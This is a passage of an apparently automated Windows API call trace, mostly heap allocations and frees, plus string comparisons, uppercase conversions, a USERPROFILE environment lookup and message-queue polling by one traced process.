(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5e6c0 [0156.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ConnectedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="onnectedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nnectedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nectedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ectedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tedDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dDevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DevicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="evicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vicesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cesPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPlatform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Platform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0156.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atform", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0156.326] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0156.326] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0156.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0156.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0156.327] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.327] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0156.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0156.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0156.328] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0156.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0156.329] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0156.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0156.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0156.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0156.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0156.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0156.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0156.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0156.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0156.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0156.331] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0156.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0156.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0156.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.332] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0156.333] RtlAllocateHeap 